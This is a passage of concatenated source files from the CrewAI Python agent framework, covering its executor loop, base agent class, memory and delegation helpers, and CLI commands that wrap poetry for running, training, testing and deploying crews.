f"\n{self.handle_parsing_errors}" elif callable(self.handle_parsing_errors): observation = f"\n{self.handle_parsing_errors(e)}" else: raise ValueError("Got unexpected type of `handle_parsing_errors`") output = AgentAction("_Exception", observation, "") if run_manager: run_manager.on_agent_action(output, color="green") tool_run_kwargs = self.agent.tool_run_logging_kwargs() observation = ExceptionTool().run( output.tool_input, verbose=False, color=None, callbacks=run_manager.get_child() if run_manager else None, **tool_run_kwargs, ) if self._should_force_answer(): error = self._i18n.errors("force_final_answer") output = AgentAction("_Exception", error, error) yield AgentStep(action=output, observation=error) return yield AgentStep(action=output, observation=observation) return except Exception as e: if LLMContextLengthExceededException(str(e))._is_context_limit_error( str(e) ): output = self._handle_context_length_error( intermediate_steps, run_manager, inputs ) if isinstance(output, AgentFinish): yield output elif isinstance(output, list): for step in output: yield step return raise e # If the tool chosen is the finishing tool, then we end and return. if isinstance(output, AgentFinish): if self.should_ask_for_human_input: human_feedback = self._ask_human_input(output.return_values["output"]) if self.crew and self.crew._train: self._handle_crew_training_output(output, human_feedback) # Making sure we only ask for it once, so disabling for the next thought loop self.should_ask_for_human_input = False action = AgentAction( tool="Human Input", tool_input=human_feedback, log=output.log ) yield AgentStep( action=action, observation=self._i18n.slice("human_feedback").format( human_feedback=human_feedback ), ) return else: if self.crew and self.crew._train: self._handle_crew_training_output(output) yield output return self._create_short_term_memory(output) actions: List[AgentAction] actions = [output] if isinstance(output, AgentAction) else output yield from actions for agent_action in actions: if run_manager: run_manager.on_agent_action(agent_action, color="green") tool_usage = ToolUsage( tools_handler=self.tools_handler, # type: ignore # Argument "tools_handler" to "ToolUsage" has incompatible type "ToolsHandler | None"; expected "ToolsHandler" tools=self.tools, # type: ignore # Argument "tools" to "ToolUsage" has incompatible type "Sequence[BaseTool]"; expected "list[BaseTool]" original_tools=self.original_tools, tools_description=self.tools_description, tools_names=self.tools_names, function_calling_llm=self.function_calling_llm, task=self.task, agent=self.crew_agent, action=agent_action, ) tool_calling = tool_usage.parse(agent_action.log) if isinstance(tool_calling, ToolUsageErrorException): observation = tool_calling.message else: if tool_calling.tool_name.casefold().strip() in [ name.casefold().strip() for name in name_to_tool_map ] or tool_calling.tool_name.casefold().replace("_", " ") in [ name.casefold().strip() for name in name_to_tool_map ]: observation = tool_usage.use(tool_calling, agent_action.log) else: observation = self._i18n.errors("wrong_tool_name").format( tool=tool_calling.tool_name, tools=", ".join([tool.name.casefold() for tool in self.tools]), ) yield AgentStep(action=agent_action, observation=observation) def _handle_crew_training_output( self, output: AgentFinish, human_feedback: str | None = None ) -> None: """Function to handle the process of the training data.""" agent_id = str(self.crew_agent.id) if ( CrewTrainingHandler(TRAINING_DATA_FILE).load() and not self.should_ask_for_human_input ): training_data = CrewTrainingHandler(TRAINING_DATA_FILE).load() if training_data.get(agent_id): training_data[agent_id][self.crew._train_iteration][ "improved_output" ] = output.return_values["output"] CrewTrainingHandler(TRAINING_DATA_FILE).save(training_data) if self.should_ask_for_human_input and human_feedback is not None: training_data = { "initial_output": output.return_values["output"], "human_feedback": human_feedback, "agent": agent_id, "agent_role": self.crew_agent.role, } CrewTrainingHandler(TRAINING_DATA_FILE).append( self.crew._train_iteration, agent_id, training_data ) def _handle_context_length( self, intermediate_steps: List[Tuple[AgentAction, str]] ) -> List[Tuple[AgentAction, str]]: text = intermediate_steps[0][1] original_action = intermediate_steps[0][0] text_splitter = RecursiveCharacterTextSplitter( separators=["\n\n", "\n"], chunk_size=8000, chunk_overlap=500, ) if self._fit_context_window_strategy == "summarize": docs = text_splitter.create_documents([text]) self._logger.log( "debug", "Summarizing Content, it is recommended to use a RAG tool", color="bold_blue", ) summarize_chain = load_summarize_chain( self.llm, chain_type="map_reduce", verbose=True ) summarized_docs = [] for doc in docs: summary = summarize_chain.invoke( {"input_documents": [doc]}, return_only_outputs=True ) summarized_docs.append(summary["output_text"]) formatted_results = "\n\n".join(summarized_docs) summary_step = AgentStep( action=AgentAction( tool=original_action.tool, tool_input=original_action.tool_input, log=original_action.log, ), observation=formatted_results, ) summary_tuple = (summary_step.action, summary_step.observation) return [summary_tuple] return intermediate_steps def _handle_context_length_error( self, intermediate_steps: List[Tuple[AgentAction, str]], run_manager: Optional[CallbackManagerForChainRun], inputs: Dict[str, str], ) -> Union[AgentFinish, List[AgentStep]]: self._logger.log( "debug", "Context length exceeded. Asking user if they want to use summarize prompt to fit, this will reduce context length.", color="yellow", ) user_choice = click.confirm( "Context length exceeded. Do you want to summarize the text to fit models context window?" ) if user_choice: self._logger.log( "debug", "Context length exceeded. Using summarize prompt to fit, this will reduce context length.", color="bold_blue", ) intermediate_steps = self._handle_context_length(intermediate_steps) output = self.agent.plan( intermediate_steps, callbacks=run_manager.get_child() if run_manager else None, **inputs, ) if isinstance(output, AgentFinish): return output elif isinstance(output, AgentAction): return [AgentStep(action=output, observation=None)] else: return [AgentStep(action=action, observation=None) for action in output] else: self._logger.log( "debug", "Context length exceeded. Consider using smaller text or RAG tools from crewai_tools.", color="red", ) raise SystemExit( "Context length exceeded and user opted not to summarize. Consider using smaller text or RAG tools from crewai_tools." ) File: src/crewai/agents/cache/__init__.py from .cache_handler import CacheHandler __all__ = ["CacheHandler"] File: src/crewai/agents/cache/cache_handler.py from typing import Any, Dict, Optional from pydantic import BaseModel, PrivateAttr class CacheHandler(BaseModel): """Callback handler for tool usage.""" _cache: Dict[str, Any] = PrivateAttr(default_factory=dict) def add(self, tool, input, output): self._cache[f"{tool}-{input}"] = output def read(self, tool, input) -> Optional[str]: return self._cache.get(f"{tool}-{input}") File: src/crewai/agents/agent_builder/base_agent.py import uuid from abc import ABC, abstractmethod from copy import copy as shallow_copy from hashlib import md5 from typing import Any, Dict, List, Optional, TypeVar from pydantic import ( UUID4, BaseModel, Field, InstanceOf, PrivateAttr, field_validator, model_validator, ) from pydantic_core import PydanticCustomError from crewai.agents.agent_builder.utilities.base_token_process import TokenProcess from crewai.agents.cache.cache_handler import CacheHandler from crewai.agents.tools_handler import ToolsHandler from crewai.utilities import I18N, Logger, RPMController from crewai.utilities.config import process_config T = TypeVar("T", bound="BaseAgent") class BaseAgent(ABC, BaseModel): """Abstract Base Class for all third party agents compatible with CrewAI. Attributes: id (UUID4): Unique identifier for the agent. role (str): Role of the agent. goal (str): Objective of the agent. backstory (str): Backstory of the agent. cache (bool): Whether the agent should use a cache for tool usage. config (Optional[Dict[str, Any]]): Configuration for the agent. verbose (bool): Verbose mode for the Agent Execution. max_rpm (Optional[int]): Maximum number of requests per minute for the agent execution. allow_delegation (bool): Allow delegation of tasks to agents. tools (Optional[List[Any]]): Tools at the agent's disposal. max_iter (Optional[int]): Maximum iterations for an agent to execute a task. agent_executor (InstanceOf): An instance of the CrewAgentExecutor class. llm (Any): Language model that will run the agent. crew (Any): Crew to which the agent belongs. i18n (I18N): Internationalization settings. cache_handler (InstanceOf[CacheHandler]): An instance of the CacheHandler class. tools_handler (InstanceOf[ToolsHandler]): An instance of the ToolsHandler class. max_tokens: Maximum number of tokens for the agent to generate in a response. Methods: execute_task(task: Any, context: Optional[str] = None, tools: Optional[List[Any]] = None) -> str: Abstract method to execute a task. create_agent_executor(tools=None) -> None: Abstract method to create an agent executor. _parse_tools(tools: List[Any]) -> List[Any]: Abstract method to parse tools. get_delegation_tools(agents: List["BaseAgent"]): Abstract method to set the agents task tools for handling delegation and question asking to other agents in crew. get_output_converter(llm, model, instructions): Abstract method to get the converter class for the agent to create json/pydantic outputs. interpolate_inputs(inputs: Dict[str, Any]) -> None: Interpolate inputs into the agent description and backstory. set_cache_handler(cache_handler: CacheHandler) -> None: Set the cache handler for the agent. increment_formatting_errors() -> None: Increment formatting errors. copy() -> "BaseAgent": Create a copy of the agent. set_rpm_controller(rpm_controller: RPMController) -> None: Set the rpm controller for the agent. set_private_attrs() -> "BaseAgent": Set private attributes. """ __hash__ = object.__hash__ # type: ignore _logger: Logger = PrivateAttr(default_factory=lambda: Logger(verbose=False)) _rpm_controller: Optional[RPMController] = PrivateAttr(default=None) _request_within_rpm_limit: Any = PrivateAttr(default=None) _original_role: Optional[str] = PrivateAttr(default=None) _original_goal: Optional[str] = PrivateAttr(default=None) _original_backstory: Optional[str] = PrivateAttr(default=None) _token_process: TokenProcess = PrivateAttr(default_factory=TokenProcess) id: UUID4 = Field(default_factory=uuid.uuid4, frozen=True) formatting_errors: int = Field( default=0, description="Number of formatting errors." ) role: str = Field(description="Role of the agent") goal: str = Field(description="Objective of the agent") backstory: str = Field(description="Backstory of the agent") config: Optional[Dict[str, Any]] = Field( description="Configuration for the agent", default=None, exclude=True ) cache: bool = Field( default=True, description="Whether the agent should use a cache for tool usage." ) verbose: bool = Field( default=False, description="Verbose mode for the Agent Execution" ) max_rpm: Optional[int] = Field( default=None, description="Maximum number of requests per minute for the agent execution to be respected.", ) allow_delegation: bool = Field( default=True, description="Allow delegation of tasks to agents" ) tools: Optional[List[Any]] = Field( default_factory=list, description="Tools at agents' disposal" ) max_iter: Optional[int] = Field( default=25, description="Maximum iterations for an agent to execute a task" ) agent_executor: InstanceOf = Field( default=None, description="An instance of the CrewAgentExecutor class." ) llm: Any = Field( default=None, description="Language model that will run the agent." ) crew: Any = Field(default=None, description="Crew to which the agent belongs.") i18n: I18N = Field(default=I18N(), description="Internationalization settings.") cache_handler: InstanceOf[CacheHandler] = Field( default=None, description="An instance of the CacheHandler class." ) tools_handler: InstanceOf[ToolsHandler] = Field( default=None, description="An instance of the ToolsHandler class." ) max_tokens: Optional[int] = Field( default=None, description="Maximum number of tokens for the agent's execution." ) @model_validator(mode="before") @classmethod def process_model_config(cls, values): return process_config(values, cls) @model_validator(mode="after") def validate_and_set_attributes(self): # Validate required fields for field in ["role", "goal", "backstory"]: if getattr(self, field) is None: raise ValueError( f"{field} must be provided either directly or through config" ) # Set private attributes self._logger = Logger(verbose=self.verbose) if self.max_rpm and not self._rpm_controller: self._rpm_controller = RPMController( max_rpm=self.max_rpm, logger=self._logger ) if not self._token_process: self._token_process = TokenProcess() return self @field_validator("id", mode="before") @classmethod def _deny_user_set_id(cls, v: Optional[UUID4]) -> None: if v: raise PydanticCustomError( "may_not_set_field", "This field is not to be set by the user.", {} ) @model_validator(mode="after") def set_private_attrs(self): """Set private attributes.""" self._logger = Logger(verbose=self.verbose) if self.max_rpm and not self._rpm_controller: self._rpm_controller = RPMController( max_rpm=self.max_rpm, logger=self._logger ) if not self._token_process: self._token_process = TokenProcess() return self @property def key(self): source = [self.role, self.goal, self.backstory] return md5("|".join(source).encode(), usedforsecurity=False).hexdigest() @abstractmethod def execute_task( self, task: Any, context: Optional[str] = None, tools: Optional[List[Any]] = None, ) -> str: pass @abstractmethod def create_agent_executor(self, tools=None) -> None: pass @abstractmethod def _parse_tools(self, tools: List[Any]) -> List[Any]: pass @abstractmethod def get_delegation_tools(self, agents: List["BaseAgent"]) -> List[Any]: """Set the task tools that init BaseAgenTools class.""" pass @abstractmethod def get_output_converter( self, llm: Any, text: str, model: type[BaseModel] | None, instructions: str ): """Get the converter class for the agent to create json/pydantic outputs.""" pass def copy(self: T) -> T: # type: ignore # Signature of "copy" incompatible with supertype "BaseModel" """Create a deep copy of the Agent.""" exclude = { "id", "_logger", "_rpm_controller", "_request_within_rpm_limit", "_token_process", "agent_executor", "tools", "tools_handler", "cache_handler", "llm", } # Copy llm and clear callbacks existing_llm = shallow_copy(self.llm) existing_llm.callbacks = [] copied_data = self.model_dump(exclude=exclude) copied_data = {k: v for k, v in copied_data.items() if v is not None} copied_agent = type(self)(**copied_data, llm=existing_llm, tools=self.tools) return copied_agent def interpolate_inputs(self, inputs: Dict[str, Any]) -> None: """Interpolate inputs into the agent description and backstory.""" if self._original_role is None: self._original_role = self.role if self._original_goal is None: self._original_goal = self.goal if self._original_backstory is None: self._original_backstory = self.backstory if inputs: self.role = self._original_role.format(**inputs) self.goal = self._original_goal.format(**inputs) self.backstory = self._original_backstory.format(**inputs) def set_cache_handler(self, cache_handler: CacheHandler) -> None: """Set the cache handler for the agent. Args: cache_handler: An instance of the CacheHandler class. """ self.tools_handler = ToolsHandler() if self.cache: self.cache_handler = cache_handler self.tools_handler.cache = cache_handler self.create_agent_executor() def increment_formatting_errors(self) -> None: self.formatting_errors += 1 def set_rpm_controller(self, rpm_controller: RPMController) -> None: """Set the rpm controller for the agent. Args: rpm_controller: An instance of the RPMController class. """ if not self._rpm_controller: self._rpm_controller = rpm_controller self.create_agent_executor() File: src/crewai/agents/agent_builder/__init__.py File: src/crewai/agents/agent_builder/base_agent_executor_mixin.py import time from typing import TYPE_CHECKING, Optional from crewai.memory.entity.entity_memory_item import EntityMemoryItem from crewai.memory.long_term.long_term_memory_item import LongTermMemoryItem from crewai.utilities.converter import ConverterError from crewai.utilities.evaluators.task_evaluator import TaskEvaluator from crewai.utilities import I18N if TYPE_CHECKING: from crewai.crew import Crew from crewai.task import Task from crewai.agents.agent_builder.base_agent import BaseAgent class CrewAgentExecutorMixin: crew: Optional["Crew"] crew_agent: Optional["BaseAgent"] task: Optional["Task"] iterations: int force_answer_max_iterations: int have_forced_answer: bool _i18n: I18N def _should_force_answer(self) -> bool: """Determine if a forced answer is required based on iteration count.""" return ( self.iterations == self.force_answer_max_iterations ) and not self.have_forced_answer def _create_short_term_memory(self, output) -> None: """Create and save a short-term memory item if conditions are met.""" if ( self.crew and self.crew_agent and self.task and "Action: Delegate work to coworker" not in output.log ): try: if ( hasattr(self.crew, "_short_term_memory") and self.crew._short_term_memory ): self.crew._short_term_memory.save( value=output.log, metadata={ "observation": self.task.description, }, agent=self.crew_agent.role, ) except Exception as e: print(f"Failed to add to short term memory: {e}") pass def _create_long_term_memory(self, output) -> None: """Create and save long-term and entity memory items based on evaluation.""" if ( self.crew and self.crew.memory and self.crew._long_term_memory and self.crew._entity_memory and self.task and self.crew_agent ): try: ltm_agent = TaskEvaluator(self.crew_agent) evaluation = ltm_agent.evaluate(self.task, output.log) if isinstance(evaluation, ConverterError): return long_term_memory = LongTermMemoryItem( task=self.task.description, agent=self.crew_agent.role, quality=evaluation.quality, datetime=str(time.time()), expected_output=self.task.expected_output, metadata={ "suggestions": evaluation.suggestions, "quality": evaluation.quality, }, ) self.crew._long_term_memory.save(long_term_memory) for entity in evaluation.entities: entity_memory = EntityMemoryItem( name=entity.name, type=entity.type, description=entity.description, relationships="\n".join( [f"- {r}" for r in entity.relationships] ), ) self.crew._entity_memory.save(entity_memory) except AttributeError as e: print(f"Missing attributes for long term memory: {e}") pass except Exception as e: print(f"Failed to add to long term memory: {e}") pass def _ask_human_input(self, final_answer: dict) -> str: """Prompt human input for final decision making.""" return input( self._i18n.slice("getting_input").format(final_answer=final_answer) ) File: src/crewai/agents/agent_builder/utilities/base_output_converter.py from abc import ABC, abstractmethod from typing import Any, Optional from pydantic import BaseModel, Field class OutputConverter(BaseModel, ABC): """ Abstract base class for converting task results into structured formats. This class provides a framework for converting unstructured text into either Pydantic models or JSON, tailored for specific agent requirements. It uses a language model to interpret and structure the input text based on given instructions. Attributes: text (str): The input text to be converted. llm (Any): The language model used for conversion. model (Any): The target model for structuring the output. instructions (str): Specific instructions for the conversion process. max_attempts (int): Maximum number of conversion attempts (default: 3). """ text: str = Field(description="Text to be converted.") llm: Any = Field(description="The language model to be used to convert the text.") model: Any = Field(description="The model to be used to convert the text.") instructions: str = Field(description="Conversion instructions to the LLM.") max_attempts: Optional[int] = Field( description="Max number of attempts to try to get the output formatted.", default=3, ) @abstractmethod def to_pydantic(self, current_attempt=1): """Convert text to pydantic.""" pass @abstractmethod def to_json(self, current_attempt=1): """Convert text to json.""" pass @property @abstractmethod def is_gpt(self) -> bool: """Return if llm provided is of gpt from openai.""" pass File: src/crewai/agents/agent_builder/utilities/__init__.py File: src/crewai/agents/agent_builder/utilities/base_token_process.py from crewai.types.usage_metrics import UsageMetrics class TokenProcess: total_tokens: int = 0 prompt_tokens: int = 0 completion_tokens: int = 0 successful_requests: int = 0 def sum_prompt_tokens(self, tokens: int): self.prompt_tokens = self.prompt_tokens + tokens self.total_tokens = self.total_tokens + tokens def sum_completion_tokens(self, tokens: int): self.completion_tokens = self.completion_tokens + tokens self.total_tokens = self.total_tokens + tokens def sum_successful_requests(self, requests: int): self.successful_requests = self.successful_requests + requests def get_summary(self) -> UsageMetrics: return UsageMetrics( total_tokens=self.total_tokens, prompt_tokens=self.prompt_tokens, completion_tokens=self.completion_tokens, successful_requests=self.successful_requests, ) File: src/crewai/agents/agent_builder/utilities/base_agent_tool.py from abc import ABC, abstractmethod from typing import List, Optional, Union from pydantic import BaseModel, Field from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.task import Task from crewai.utilities import I18N class BaseAgentTools(BaseModel, ABC): """Default tools around agent delegation""" agents: List[BaseAgent] = Field(description="List of agents in this crew.") i18n: I18N = Field(default=I18N(), description="Internationalization settings.") @abstractmethod def tools(self): pass def _get_coworker(self, coworker: Optional[str], **kwargs) -> Optional[str]: coworker = coworker or kwargs.get("co_worker") or kwargs.get("coworker") if coworker: is_list = coworker.startswith("[") and coworker.endswith("]") if is_list: coworker = coworker[1:-1].split(",")[0] return coworker def delegate_work( self, task: str, context: str, coworker: Optional[str] = None, **kwargs ): """Useful to delegate a specific task to a coworker passing all necessary context and names.""" coworker = self._get_coworker(coworker, **kwargs) return self._execute(coworker, task, context) def ask_question( self, question: str, context: str, coworker: Optional[str] = None, **kwargs ): """Useful to ask a question, opinion or take from a coworker passing all necessary context and names.""" coworker = self._get_coworker(coworker, **kwargs) return self._execute(coworker, question, context) def _execute( self, agent_name: Union[str, None], task: str, context: Union[str, None] ): """Execute the command.""" try: if agent_name is None: agent_name = "" # It is important to remove the quotes from the agent name. # The reason we have to do this is because less-powerful LLM's # have difficulty producing valid JSON. # As a result, we end up with invalid JSON that is truncated like this: # {"task": "....", "coworker": ".... # when it should look like this: # {"task": "....", "coworker": "...."} agent_name = agent_name.casefold().replace('"', "").replace("\n", "") agent = [ # type: ignore # Incompatible types in assignment (expression has type "list[BaseAgent]", variable has type "str | None") available_agent for available_agent in self.agents if available_agent.role.casefold().replace("\n", "") == agent_name ] except Exception as _: return self.i18n.errors("agent_tool_unexsiting_coworker").format( coworkers="\n".join( [f"- {agent.role.casefold()}" for agent in self.agents] ) ) if not agent: return self.i18n.errors("agent_tool_unexsiting_coworker").format( coworkers="\n".join( [f"- {agent.role.casefold()}" for agent in self.agents] ) ) agent = agent[0] task_with_assigned_agent = Task( # type: ignore # Incompatible types in assignment (expression has type "Task", variable has type "str") description=task, agent=agent, expected_output="Your best answer to your coworker asking you this, accounting for the context shared.", ) return agent.execute_task(task_with_assigned_agent, context) File: src/crewai/cli/run_crew.py import subprocess import click def run_crew() -> None: """ Run the crew by running a command in the Poetry environment. """ command = ["poetry", "run", "run_crew"] try: result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while running the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/__init__.py File: src/crewai/cli/reset_memories_command.py import subprocess import click from crewai.memory.entity.entity_memory import EntityMemory from crewai.memory.long_term.long_term_memory import LongTermMemory from crewai.memory.short_term.short_term_memory import ShortTermMemory from crewai.utilities.task_output_storage_handler import TaskOutputStorageHandler def reset_memories_command(long, short, entity, kickoff_outputs, all) -> None: """ Reset the crew memories. Args: long (bool): Whether to reset the long-term memory. short (bool): Whether to reset the short-term memory. entity (bool): Whether to reset the entity memory. kickoff_outputs (bool): Whether to reset the latest kickoff task outputs. all (bool): Whether to reset all memories. """ try: if all: ShortTermMemory().reset() EntityMemory().reset() LongTermMemory().reset() TaskOutputStorageHandler().reset() click.echo("All memories have been reset.") else: if long: LongTermMemory().reset() click.echo("Long term memory has been reset.") if short: ShortTermMemory().reset() click.echo("Short term memory has been reset.") if entity: EntityMemory().reset() click.echo("Entity memory has been reset.") if kickoff_outputs: TaskOutputStorageHandler().reset() click.echo("Latest Kickoff outputs stored has been reset.") except subprocess.CalledProcessError as e: click.echo(f"An error occurred while resetting the memories: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/evaluate_crew.py import subprocess import click def evaluate_crew(n_iterations: int, model: str) -> None: """ Test and Evaluate the crew by running a command in the Poetry environment. Args: n_iterations (int): The number of iterations to test the crew. model (str): The model to test the crew with. """ command = ["poetry", "run", "test", str(n_iterations), model] try: if n_iterations <= 0: raise ValueError("The number of iterations must be a positive integer.") result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while testing the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/replay_from_task.py import subprocess import click def replay_task_command(task_id: str) -> None: """ Replay the crew execution from a specific task. Args: task_id (str): The ID of the task to replay from. """ command = ["poetry", "run", "replay", task_id] try: result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while replaying the task: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/cli.py from typing import Optional import click import pkg_resources from crewai.cli.create_crew import create_crew from crewai.cli.create_pipeline import create_pipeline from crewai.memory.storage.kickoff_task_outputs_storage import ( KickoffTaskOutputsSQLiteStorage, ) from .authentication.main import AuthenticationCommand from .deploy.main import DeployCommand from .evaluate_crew import evaluate_crew from .install_crew import install_crew from .replay_from_task import replay_task_command from .reset_memories_command import reset_memories_command from .run_crew import run_crew from .train_crew import train_crew @click.group() def crewai(): """Top-level command group for crewai.""" @crewai.command() @click.argument("type", type=click.Choice(["crew", "pipeline"])) @click.argument("name") @click.option( "--router", is_flag=True, help="Create a pipeline with router functionality" ) def create(type, name, router): """Create a new crew or pipeline.""" if type == "crew": create_crew(name) elif type == "pipeline": create_pipeline(name, router) else: click.secho("Error: Invalid type. Must be 'crew' or 'pipeline'.", fg="red") @crewai.command() @click.option( "--tools", is_flag=True, help="Show the installed version of crewai tools" ) def version(tools): """Show the installed version of crewai.""" crewai_version = pkg_resources.get_distribution("crewai").version click.echo(f"crewai version: {crewai_version}") if tools: try: tools_version = pkg_resources.get_distribution("crewai-tools").version click.echo(f"crewai tools version: {tools_version}") except pkg_resources.DistributionNotFound: click.echo("crewai tools not installed") @crewai.command() @click.option( "-n", "--n_iterations", type=int, default=5, help="Number of iterations to train the crew", ) @click.option( "-f", "--filename", type=str, default="trained_agents_data.pkl", help="Path to a custom file for training", ) def train(n_iterations: int, filename: str): """Train the crew.""" click.echo(f"Training the Crew for {n_iterations} iterations") train_crew(n_iterations, filename) @crewai.command() @click.option( "-t", "--task_id", type=str, help="Replay the crew from this task ID, including all subsequent tasks.", ) def replay(task_id: str) -> None: """ Replay the crew execution from a specific task. Args: task_id (str): The ID of the task to replay from. """ try: click.echo(f"Replaying the crew from task {task_id}") replay_task_command(task_id) except Exception as e: click.echo(f"An error occurred while replaying: {e}", err=True) @crewai.command() def log_tasks_outputs() -> None: """ Retrieve your latest crew.kickoff() task outputs. """ try: storage = KickoffTaskOutputsSQLiteStorage() tasks = storage.load() if not tasks: click.echo( "No task outputs found. Only crew kickoff task outputs are logged." ) return for index, task in enumerate(tasks, 1): click.echo(f"Task {index}: {task['task_id']}") click.echo(f"Description: {task['expected_output']}") click.echo("------") except Exception as e: click.echo(f"An error occurred while logging task outputs: {e}", err=True) @crewai.command() @click.option("-l", "--long", is_flag=True, help="Reset LONG TERM memory") @click.option("-s", "--short", is_flag=True, help="Reset SHORT TERM memory") @click.option("-e", "--entities", is_flag=True, help="Reset ENTITIES memory") @click.option( "-k", "--kickoff-outputs", is_flag=True, help="Reset LATEST KICKOFF TASK OUTPUTS", ) @click.option("-a", "--all", is_flag=True, help="Reset ALL memories") def reset_memories(long, short, entities, kickoff_outputs, all): """ Reset the crew memories (long, short, entity, latest_crew_kickoff_ouputs). This will delete all the data saved. """ try: if not all and not (long or short or entities or kickoff_outputs): click.echo( "Please specify at least one memory type to reset using the appropriate flags." ) return reset_memories_command(long, short, entities, kickoff_outputs, all) except Exception as e: click.echo(f"An error occurred while resetting memories: {e}", err=True) @crewai.command() @click.option( "-n", "--n_iterations", type=int, default=3, help="Number of iterations to Test the crew", ) @click.option( "-m", "--model", type=str, default="gpt-4o-mini", help="LLM Model to run the tests on the Crew. For now only accepting only OpenAI models.", ) def test(n_iterations: int, model: str): """Test the crew and evaluate the results.""" click.echo(f"Testing the crew for {n_iterations} iterations with model {model}") evaluate_crew(n_iterations, model) @crewai.command() def install(): """Install the Crew.""" install_crew() @crewai.command() def run(): """Run the Crew.""" click.echo("Running the Crew") run_crew() @crewai.command() def signup(): """Sign Up/Login to CrewAI+.""" AuthenticationCommand().signup() @crewai.command() def login(): """Sign Up/Login to CrewAI+.""" AuthenticationCommand().signup() # DEPLOY CREWAI+ COMMANDS @crewai.group() def deploy(): """Deploy the Crew CLI group.""" pass @deploy.command(name="create") @click.option("-y", "--yes", is_flag=True, help="Skip the confirmation prompt") def deploy_create(yes: bool): """Create a Crew deployment.""" deploy_cmd = DeployCommand() deploy_cmd.create_crew(yes) @deploy.command(name="list") def deploy_list(): """List all deployments.""" deploy_cmd = DeployCommand() deploy_cmd.list_crews() @deploy.command(name="push") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deploy_push(uuid: Optional[str]): """Deploy the Crew.""" deploy_cmd = DeployCommand() deploy_cmd.deploy(uuid=uuid) @deploy.command(name="status") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deply_status(uuid: Optional[str]): """Get the status of a deployment.""" deploy_cmd = DeployCommand() deploy_cmd.get_crew_status(uuid=uuid) @deploy.command(name="logs") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deploy_logs(uuid: Optional[str]): """Get the logs of a deployment.""" deploy_cmd = DeployCommand() deploy_cmd.get_crew_logs(uuid=uuid) @deploy.command(name="remove") @click.option("-u", "--uuid", type=str, help="Crew UUID parameter") def deploy_remove(uuid: Optional[str]): """Remove a deployment.""" deploy_cmd = DeployCommand() deploy_cmd.remove_crew(uuid=uuid) if __name__ == "__main__": crewai() File: src/crewai/cli/train_crew.py import subprocess import click def train_crew(n_iterations: int, filename: str) -> None: """ Train the crew by running a command in the Poetry environment. Args: n_iterations (int): The number of iterations to train the crew. """ command = ["poetry", "run", "train", str(n_iterations), filename] try: if n_iterations <= 0: raise ValueError("The number of iterations must be a positive integer.") if not filename.endswith(".pkl"): raise ValueError("The filename must not end with .pkl") result = subprocess.run(command, capture_output=False, text=True, check=True) if result.stderr: click.echo(result.stderr, err=True) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while training the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/utils.py import click def copy_template(src, dst, name, class_name, folder_name): """Copy a file from src to dst.""" with open(src, "r") as file: content = file.read() # Interpolate the content content = content.replace("{{name}}", name) content = content.replace("{{crew_name}}", class_name) content = content.replace("{{folder_name}}", folder_name) # Write the interpolated content to the new file with open(dst, "w") as file: file.write(content) click.secho(f" - Created {dst}", fg="green") File: src/crewai/cli/install_crew.py import subprocess import click def install_crew() -> None: """ Install the crew by running the Poetry command to lock and install. """ try: subprocess.run(["poetry", "lock"], check=True, capture_output=False, text=True) subprocess.run( ["poetry", "install"], check=True, capture_output=False, text=True ) except subprocess.CalledProcessError as e: click.echo(f"An error occurred while running the crew: {e}", err=True) click.echo(e.output, err=True) except Exception as e: click.echo(f"An unexpected error occurred: {e}", err=True) File: src/crewai/cli/create_crew.py from pathlib import Path import click from crewai.cli.utils import copy_template def create_crew(name, parent_folder=None): """Create a new crew.""" folder_name = name.replace(" ", "_").replace("-", "_").lower() class_name = name.replace("_", " ").replace("-", " ").title().replace(" ", "") if parent_folder: folder_path = Path(parent_folder) / folder_name else: folder_path = Path(folder_name) click.secho( f"Creating {'crew' if parent_folder else 'folder'} {folder_name}...", fg="green", bold=True, ) if not folder_path.exists(): folder_path.mkdir(parents=True) (folder_path / "tests").mkdir(exist_ok=True) if not parent_folder: (folder_path / "src" / folder_name).mkdir(parents=True) (folder_path / "src" / folder_name / "tools").mkdir(parents=True) (folder_path / "src" / folder_name / "config").mkdir(parents=True) with open(folder_path / ".env", "w") as file: file.write("OPENAI_API_KEY=YOUR_API_KEY") else: click.secho( f"\tFolder {folder_name} already exists. Please choose a different name.", fg="red", ) return package_dir = Path(__file__).parent templates_dir = package_dir / "templates" / "crew" # List of template files to copy root_template_files = ( [".gitignore", "pyproject.toml", "README.md"] if not parent_folder else [] ) tools_template_files = ["tools/custom_tool.py", "tools/__init__.py"] config_template_files = ["config/agents.yaml", "config/tasks.yaml"] src_template_files = ( ["__init__.py", "main.py", "crew.py"] if not parent_folder else ["crew.py"] ) for file_name in root_template_files: src_file = templates_dir / file_name dst_file = folder_path / file_name copy_template(src_file, dst_file, name, class_name, folder_name) src_folder = folder_path / "src" / folder_name if not parent_folder else folder_path for file_name in src_template_files: src_file = templates_dir / file_name dst_file = src_folder / file_name copy_template(src_file, dst_file, name, class_name, folder_name) if not parent_folder: for file_name in tools_template_files + config_template_files: src_file = templates_dir / file_name dst_file = src_folder / file_name copy_template(src_file, dst_file, name, class_name, folder_name) click.secho(f"Crew {name} created successfully!", fg="green", bold=True) File: src/crewai/cli/create_pipeline.py import shutil from pathlib import Path import click def create_pipeline(name, router=False): """Create a new pipeline project.""" folder_name = name.replace(" ", "_").replace("-", "_").lower() class_name = 